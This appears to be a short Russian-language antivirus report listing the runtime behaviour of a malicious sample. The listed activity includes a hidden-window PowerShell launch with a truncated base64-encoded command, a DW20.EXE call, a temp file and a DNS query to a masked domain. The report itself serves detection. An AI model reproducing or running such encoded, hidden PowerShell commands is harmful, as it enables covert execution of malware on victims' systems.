Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDADgANAA5ADIANAA4ADUAPQAnAGoAXwAxADgANwA0ACcAOwAkAFIAOQAyADUANQAzADEANQAgAD0AIAAnADUAOQA1ACcAOwAkAGoANQAxADgANwA1ADkANAA9ACcAVgAyADIAMwA2ADkAMAAnADsAJABiAF8AMgA4ADMANwA0AD0AJABlAG4AdgA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\491683.cvr
- DNS ASK ws###hanykh.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDADgANAA5ADIANAA4ADUAPQAnAGoAXwAxADgANwA0ACcAOwAkAFIAOQAyADUANQAzADEANQAgAD0AIAAnADUAOQA1ACcAOwAkAGoANQAxADgANwA1ADkANAA9ACcAVgAyADIAMwA2ADkAMAAnADsAJABiAF8AMgA4ADMANwA0AD0AJABlAG4AdgA...' (со скрытым окном)